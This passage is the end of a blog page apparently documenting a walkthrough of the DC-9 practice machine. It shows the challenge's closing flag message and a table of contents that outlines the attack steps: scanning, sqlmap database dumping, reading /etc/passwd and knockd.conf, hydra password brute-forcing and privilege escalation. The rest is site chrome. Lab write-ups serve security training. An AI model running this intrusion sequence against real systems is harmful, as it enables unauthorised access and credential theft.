╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝</span><br><span class="line">                                                                             </span><br><span class="line">Congratulations - you have done well to get to this point.</span><br><span class="line"></span><br><span class="line">Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those</span><br><span class="line">who have taken the time to complete the various DC challenges.</span><br><span class="line"></span><br><span class="line">I also want to send out a big thank you to the various members of @m0tl3ycr3w .</span><br><span class="line"></span><br><span class="line">They are an inspirational bunch of fellows.</span><br><span class="line"></span><br><span class="line">Sure, they might smell a bit, but...just kidding.  :-)</span><br><span class="line"></span><br><span class="line">Sadly, all things must come to an end, and this will be the last ever</span><br><span class="line">challenge in the DC series.</span><br><span class="line"></span><br><span class="line">So long, and thanks for all the fish.</span><br></pre></td></tr></table></figure>

<p>[^1]: </p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/05/03/%E9%9D%B6%E6%9C%BA/vulnhub/Game-of-Thrones-%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C/" rel="prev" title="Game-of-Thrones-扫描结果">
      <i class="fa fa-chevron-left"></i> Game-of-Thrones-扫描结果
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/05/03/%E9%9D%B6%E6%9C%BA/vulnhub/DC8/" rel="next" title="DC8">
      DC8 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E6%8E%A2%E6%B5%8B"><span class="nav-number">1.</span> <span class="nav-text">1.探测</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap"><span class="nav-number">1.1.</span> <span class="nav-text">nmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dirsearch"><span class="nav-number">1.2.</span> <span class="nav-text">dirsearch</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-sqlmap"><span class="nav-number">2.</span> <span class="nav-text">2.sqlmap</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="nav-number">2.1.</span> <span class="nav-text">方法一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="nav-number">2.2.</span> <span class="nav-text">方法二</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%88%86%E7%A0%B4%E5%BA%93"><span class="nav-number">2.3.</span> <span class="nav-text">爆破库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8B%E5%BA%93%E4%B8%AD%E7%9A%84%E8%A1%A8"><span class="nav-number">2.4.</span> <span class="nav-text">查看库中的表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8B%E8%A1%A8%E4%B8%AD%E7%9A%84%E5%AD%97%E6%AE%B5"><span class="nav-number">2.5.</span> <span class="nav-text">查看表中的字段</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8B%E6%8C%87%E5%AE%9A%E5%AD%97%E6%AE%B5%E7%9A%84%E6%95%B0%E6%8D%AE"><span class="nav-number">2.6.</span> <span class="nav-text">查看指定字段的数据</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%86%E6%95%B0%E6%8D%AE%E4%BF%9D%E5%AD%98%E4%B8%8B%E6%9D%A5"><span class="nav-number">2.7.</span> <span class="nav-text">将数据保存下来</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8BStaff%E5%BA%93"><span class="nav-number">2.8.</span> <span class="nav-text">查看Staff库</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E7%99%BB%E5%BD%95"><span class="nav-number">3.</span> <span class="nav-text">3.登录</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#etc-passwd"><span class="nav-number">3.1.</span> <span class="nav-text">&#x2F;etc&#x2F;passwd</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#etc-ssh-sshd-config"><span class="nav-number">3.2.</span> <span class="nav-text">&#x2F;etc&#x2F;ssh&#x2F;sshd_config</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#proc-sched-debug"><span class="nav-number">3.3.</span> <span class="nav-text">&#x2F;proc&#x2F;sched_debug</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#etc-knockd-conf"><span class="nav-number">3.4.</span> <span class="nav-text">&#x2F;etc&#x2F;knockd.conf</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-hydra"><span class="nav-number">4.</span> <span class="nav-text">4.hydra</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%94%A8%E6%88%B7chandlerb"><span class="nav-number">4.1.</span> <span class="nav-text">用户chandlerb</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%94%A8%E6%88%B7joeyt"><span class="nav-number">4.2.</span> <span class="nav-text">用户joeyt</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%94%A8%E6%88%B7janitor"><span class="nav-number">4.3.</span> <span class="nav-text">用户janitor</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%94%A8%E6%88%B7fredf"><span class="nav-number">4.4.</span> <span class="nav-text">用户fredf</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-%E6%8F%90%E6%9D%83"><span class="nav-number">5.</span> <span class="nav-text">5.提权</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zhaochoudecat"
      src="/images/saber.jpg">
  <p class="site-author-name" itemprop="name">zhaochoudecat</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


<div class="saber-gallery motion-element">
  <div class="saber-gallery-container" id="saberGallery">
    <div class="saber-gallery-track">
      <img class="saber-gallery-img" src="/images/blue_saber.png" alt="Blue Saber" data-index="0">
      <img class="saber-gallery-img" src="/images/daily_saber.png" alt="Daily Saber" data-index="1">
      <img class="saber-gallery-img" src="/images/dark_saber.png" alt="Dark Saber" data-index="2">
    </div>
    <button class="saber-gallery-arrow saber-gallery-prev" id="saberPrev" aria-label="上一张">
      <i class="fa fa-chevron-left"></i>
    </button>
    <button class="saber-gallery-arrow saber-gallery-next" id="saberNext" aria-label="下一张">
      <i class="fa fa-chevron-right"></i>
    </button>
    <div class="saber-gallery-dots">
      <span class="saber-gallery-dot active"></span>
      <span class="saber-gallery-dot"></span>
      <span class="saber-gallery-dot"></span>
    </div>
  </div>
</div>

<div class="saber-lightbox" id="saberLightbox">
  <div class="saber-lightbox-overlay"></div>
  <button class="saber-lightbox-close" id="saberLightboxClose" aria-label="关闭">
    <i class="fa fa-times"></i>
  </button>
  <button class="saber-lightbox-arrow saber-lightbox-prev" id="saberLightboxPrev" aria-label="上一张">
    <i class="fa fa-chevron-left"></i>
  </button>
  <button class="saber-lightbox-arrow saber-lightbox-next" id="saberLightboxNext" aria-label="下一张">
    <i class="fa fa-chevron-right"></i>
  </button>
  <div class="saber-lightbox-content">
    <img class="saber-lightbox-img" id="saberLightboxImg" src="" alt="">
  </div>
  <div class="saber-lightbox-counter" id="saberLightboxCounter"></div>
</div>

<style>
.saber-gallery {
  margin-top: 15px;
  text-align: center;
}
.saber-gallery-container {
  position: relative;
  width: 100%;
  height: 280px;
  overflow: hidden;
  border-radius: 8px;
  cursor: pointer;
  user-select: none;
  -webkit-user-select: none;
}
.saber-gallery-container:active {
  cursor: pointer;
}
.saber-gallery-track {
  display: flex;
  height: 100%;
  transition: transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  will-change: transform;
}
.saber-gallery-img {
  flex-shrink: 0;
  width: 100%;
  height: 100%;
  object-fit: contain;
  object-position: center;
  pointer-events: none;
}
.saber-gallery-arrow {
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
  width: 32px;
  height: 32px;
  border: none;
  border-radius: 50%;
  background: rgba(0, 0, 0, 0.4);
  color: #fff;
  font-size: 14px;
  cursor: pointer;
  opacity: 0;
  transition: opacity 0.3s ease, background 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
  z-index: 2;
}
.saber-gallery-container:hover .saber-gallery-arrow {
  opacity: 1;
}
.saber-gallery-arrow:hover {
  background: rgba(0, 0, 0, 0.7);
}
.saber-gallery-arrow.disabled {
  opacity: 0.2 !important;
  cursor: not-allowed;
}
.saber-gallery-prev {
  left: 8px;
}
.saber-gallery-next {
  right: 8px;
}
.saber-gallery-dots {
  position: absolute;
  bottom: 10px;
  left: 50%;
  transform: translateX(-50%);
  display: flex;
  gap: 6px;
  z-index: 2;
}
.saber-gallery-dot {
  width: 6px;
  height: 6px;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.5);
  transition: background 0.3s ease, transform 0.3s ease;
  cursor: pointer;
}
.saber-gallery-dot.active {
  background: rgba(255, 255, 255, 0.95);
  transform: scale(1.3);
}

/* Lightbox Styles */
.saber-lightbox {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index: 9999;
  display: none;
  opacity: 0;
  transition: opacity 0.3s ease;
}
.saber-lightbox.active {
  display: flex;
  opacity: 1;
}
.saber-lightbox-overlay {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.92);
  cursor: pointer;
}
.saber-lightbox-content {
  position: relative;
  z-index: 2;
  margin: auto;
  max-width: 90vw;
  max-height: 90vh;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-img {
  max-width: 100%;
  max-height: 90vh;
  object-fit: contain;
  border-radius: 4px;
  transform: scale(0.8);
  transition: transform 0.3s cubic-bezier(0.25, 0.46, 0.45, 0.94);
}
.saber-lightbox.active .saber-lightbox-img {
  transform: scale(1);
}
.saber-lightbox-close {
  position: absolute;
  top: 20px;
  right: 30px;
  width: 40px;
  height: 40px;
  border: none;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.15);
  color: #fff;
  font-size: 18px;
  cursor: pointer;
  z-index: 3;
  transition: background 0.3s ease, transform 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-close:hover {
  background: rgba(255, 255, 255, 0.3);
  transform: rotate(90deg);
}
.saber-lightbox-arrow {
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
  width: 50px;
  height: 50px;
  border: none;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.15);
  color: #fff;
  font-size: 20px;
  cursor: pointer;
  z-index: 3;
  transition: background 0.3s ease, opacity 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-arrow:hover {
  background: rgba(255, 255, 255, 0.3);
}
.saber-lightbox-arrow.disabled {
  opacity: 0.2;
  cursor: not-allowed;
}
.saber-lightbox-prev {
  left: 20px;
}
.saber-lightbox-next {
  right: 20px;
}
.saber-lightbox-counter {
  position: absolute;
  bottom: 20px;
  left: 50%;
  transform: translateX(-50%);
  color: rgba(255, 255, 255, 0.8);
  font-size: 14px;
  z-index: 3;
  letter-spacing: 2px;
}

@media (max-width: 768px) {
  .saber-lightbox-arrow {
    width: 40px;
    height: 40px;
    font-size: 16px;
  }
  .saber-lightbox-prev {
    left: 10px;
  }
  .saber-lightbox-next {
    right: 10px;
  }
  .saber-lightbox-close {
    top: 10px;
    right: 15px;
    width: 36px;
    height: 36px;
    font-size: 16px;
  }
}
</style>

<script>
(function() {
  // Gallery Logic
  var container = document.getElementById('saberGallery');
  var track = container.querySelector('.saber-gallery-track');
  var images = container.querySelectorAll('.saber-gallery-img');
  var dots = container.querySelectorAll('.saber-gallery-dot');
  var prevBtn = document.getElementById('saberPrev');
  var nextBtn = document.getElementById('saberNext');
  var current = 0;
  var total = images.length;
  var autoInterval = 15000;
  var timer = null;

  function goTo(index) {
    if (index < 0) index = 0;
    if (index >= total) index = total - 1;
    current = index;
    track.style.transform = 'translateX(-' + (current * 100) + '%)';
    dots.forEach(function(dot, i) {
      dot.classList.toggle('active', i === current);
    });
    updateArrows();
  }

  function updateArrows() {
    prevBtn.classList.toggle('disabled', current === 0);
    nextBtn.classList.toggle('disabled', current === total - 1);
  }

  function next() {
    if (current < total - 1) {
      goTo(current + 1);
    }
  }

  function prev() {
    if (current > 0) {
      goTo(current - 1);
    }
  }

  function startAuto() {
    timer = setInterval(function() {
      if (current < total - 1) {
        goTo(current + 1);
      } else {
        goTo(0);
      }
    }, autoInterval);
  }

  function stopAuto() {
    clearInterval(timer);
  }

  prevBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    stopAuto();
    prev();
    startAuto();
  });

  nextBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    stopAuto();
    next();
    startAuto();
  });

  dots.forEach(function(dot, i) {
    dot.addEventListener('click', function(e) {
      e.stopPropagation();
      stopAuto();
      goTo(i);
      startAuto();
    });
  });

  // Touch swipe support
  var startX = 0;
  var startY = 0;
  var isDragging = false;
  var currentTranslate = 0;
  var prevTranslate = 0;

  container.addEventListener('touchstart', function(e) {
    startX = e.touches[0].clientX;
    startY = e.touches[0].clientY;
    isDragging = true;
    stopAuto();
    track.style.transition = 'none';
  }, { passive: true });

  container.addEventListener('touchmove', function(e) {
    if (!isDragging) return;
    var diffX = e.touches[0].clientX - startX;
    var diffY = e.touches[0].clientY - startY;
    if (Math.abs(diffX) > Math.abs(diffY)) {
      currentTranslate = prevTranslate + diffX;
      track.style.transform = 'translateX(' + currentTranslate + 'px)';
    }
  }, { passive: true });

  container.addEventListener('touchend', function(e) {
    if (!isDragging) return;
    isDragging = false;
    track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
    var diffX = e.changedTouches[0].clientX - startX;
    if (Math.abs(diffX) > 50) {
      if (diffX > 0 && current > 0) {
        prev();
      } else if (diffX < 0 && current < total - 1) {
        next();
      } else {
        goTo(current);
      }
    } else {
      goTo(current);
    }
    prevTranslate = -(current * container.offsetWidth);
    startAuto();
  });

  // Mouse drag support
  var mouseDown = false;
  container.addEventListener('mousedown', function(e) {
    mouseDown = true;
    startX = e.clientX;
    stopAuto();
    track.style.transition = 'none';
    e.preventDefault();
  });

  container.addEventListener('mousemove', function(e) {
    if (!mouseDown) return;
    var diffX = e.clientX - startX;
    currentTranslate = prevTranslate + diffX;
    track.style.transform = 'translateX(' + currentTranslate + 'px)';
  });

  container.addEventListener('mouseup', function(e) {
    if (!mouseDown) return;
    mouseDown = false;
    track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
    var diffX = e.clientX - startX;
    if (Math.abs(diffX) > 50) {
      if (diffX > 0 && current > 0) {
        prev();
      } else if (diffX < 0 && current < total - 1) {
        next();
      } else {
        goTo(current);
      }
    } else {
      goTo(current);
    }
    prevTranslate = -(current * container.offsetWidth);
    startAuto();
  });

  container.addEventListener('mouseleave', function() {
    if (mouseDown) {
      mouseDown = false;
      track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
      goTo(current);
      prevTranslate = -(current * container.offsetWidth);
      startAuto();
    }
  });

  window.addEventListener('resize', function() {
    prevTranslate = -(current * container.offsetWidth);
  });

  // Lightbox Logic
  var lightbox = document.getElementById('saberLightbox');
  var lightboxImg = document.getElementById('saberLightboxImg');
  var lightboxClose = document.getElementById('saberLightboxClose');
  var lightboxPrevBtn = document.getElementById('saberLightboxPrev');
  var lightboxNextBtn = document.getElementById('saberLightboxNext');
  var lightboxCounter = document.getElementById('saberLightboxCounter');
  var lightboxOverlay = lightbox.querySelector('.saber-lightbox-overlay');
  var lightboxCurrent = 0;
  var imgSources = Array.from(images).map(function(img) { return img.src; });

  function openLightbox(index) {
    lightboxCurrent = index;
    lightboxImg.src = imgSources[lightboxCurrent];
    updateLightboxCounter();
    updateLightboxArrows();
    lightbox.style.display = 'flex';
    document.body.style.overflow = 'hidden';
    // Force reflow
    lightbox.offsetHeight;
    lightbox.classList.add('active');
    stopAuto();
  }

  function closeLightbox() {
    lightbox.classList.remove('active');
    document.body.style.overflow = '';
    setTimeout(function() {
      lightbox.style.display = 'none';
      lightboxImg.src = '';
      startAuto();
    }, 300);
  }

  function updateLightboxCounter() {
    lightboxCounter.textContent = (lightboxCurrent + 1) + ' / ' + total;
  }

  function updateLightboxArrows() {
    lightboxPrevBtn.classList.toggle('disabled', lightboxCurrent === 0);
    lightboxNextBtn.classList.toggle('disabled', lightboxCurrent === total - 1);
  }

  function lightboxGoTo(index) {
    if (index < 0 || index >= total) return;
    lightboxCurrent = index;
    lightboxImg.style.opacity = '0.5';
    setTimeout(function() {
      lightboxImg.src = imgSources[lightboxCurrent];
      lightboxImg.style.opacity = '1';
      updateLightboxCounter();
      updateLightboxArrows();
    }, 150);
  }

  function lightboxNext() {
    if (lightboxCurrent < total - 1) {
      lightboxGoTo(lightboxCurrent + 1);
    }
  }

  function lightboxPrev() {
    if (lightboxCurrent > 0) {
      lightboxGoTo(lightboxCurrent - 1);
    }
  }

  // Click on gallery image to open lightbox
  container.addEventListener('click', function(e) {
    if (e.target.closest('.saber-gallery-arrow') || e.target.closest('.saber-gallery-dots')) return;
    openLightbox(current);
  });

  lightboxClose.addEventListener('click', closeLightbox);
  lightboxOverlay.addEventListener('click', closeLightbox);

  lightboxPrevBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    lightboxPrev();
  });

  lightboxNextBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    lightboxNext();
  });

  // Keyboard navigation
  document.addEventListener('keydown', function(e) {
    if (!lightbox.classList.contains('active')) return;
    if (e.key === 'Escape') {
      closeLightbox();
    } else if (e.key === 'ArrowLeft') {
      lightboxPrev();
    } else if (e.key === 'ArrowRight') {
      lightboxNext();
    }
  });

  // Swipe in lightbox
  var lbStartX = 0;
  lightbox.addEventListener('touchstart', function(e) {
    lbStartX = e.touches[0].clientX;
  }, { passive: true });

  lightbox.addEventListener('touchend', function(e) {
    var diffX = e.changedTouches[0].clientX - lbStartX;
    if (Math.abs(diffX) > 80) {
      if (diffX > 0) {
        lightboxPrev();
      } else {
        lightboxNext();
      }
    }
  }, { passive: true });

  // Initialize
  prevTranslate = 0;
  updateArrows();
  startAuto();
})();
</script>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zhaochoudecat</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
